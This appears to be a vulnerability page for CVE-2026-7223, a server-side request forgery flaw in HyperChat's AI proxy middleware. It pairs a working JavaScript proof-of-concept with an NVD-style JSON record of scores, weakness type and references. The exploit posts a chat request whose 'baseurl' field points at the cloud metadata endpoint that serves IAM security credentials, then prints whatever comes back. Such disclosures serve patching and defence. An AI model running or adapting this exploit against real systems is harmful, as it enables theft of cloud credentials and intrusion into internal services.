CVE-2026-7223

// PoC for CVE-2026-7223: HyperChat SSRF // Target: BigSweetPotatoStudio HyperChat <= 2.0.0-alpha.63 // Description: Exploiting the 'baseurl' parameter in AI Proxy Middleware const axios = require('axios'); // Target URL of the vulnerable HyperChat instance const TARGET = 'http://vulnerable-host:3000'; // Malicious internal URL to access (e.g., AWS Metadata, Local Admin Panel) // Change this to your controlled server or internal target to verify const MALICIOUS_URL = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'; async function exploit() { console.log(`[+] Sending SSRF payload to ${TARGET}...`); try { // Constructing the payload with the manipulated 'baseurl' argument const payload = { messages: [{ role: 'user', content: 'test' }], // The vulnerable parameter baseurl: MALICIOUS_URL }; // Sending the request to the vulnerable endpoint const response = await axios.post(`${TARGET}/api/chat/completions`, payload, { headers: { 'Content-Type': 'application/json' }, // Disable redirect following to capture potential 30x leaks if any maxRedirects: 0, timeout: 5000 }); console.log('[+] Request sent successfully!'); console.log('[+] Response data:', JSON.stringify(response.data, null, 2)); } catch (error) { if (error.response) { console.log('[!] Server responded with status:', error.response.status); console.log('[!] Response data:', JSON.stringify(error.response.data, null, 2)); } else { console.error('[!] Exploit failed:', error.message); } } } exploit();

{"cve": {"id": "CVE-2026-7223", "sourceIdentifier": "[email protected]", "published": "2026-04-28T04:16:29.043", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in BigSweetPotatoStudio HyperChat up to 2.0.0-alpha.63. Affected by this issue is the function fetch of the file packages/core/src/http/aiProxyMiddleware.mts of the component AI Proxy Middleware. Such manipulation of the argument baseurl leads to server-side request forgery. The attack can be launched remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/BigSweetPotatoStudio/HyperChat/", "source": "[email protected]"}, {"url": "https://github.com/BigSweetPotatoStudio/HyperChat/issues/142", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/802265", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359823", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359823/cti", "source": "[email protected]"}]}}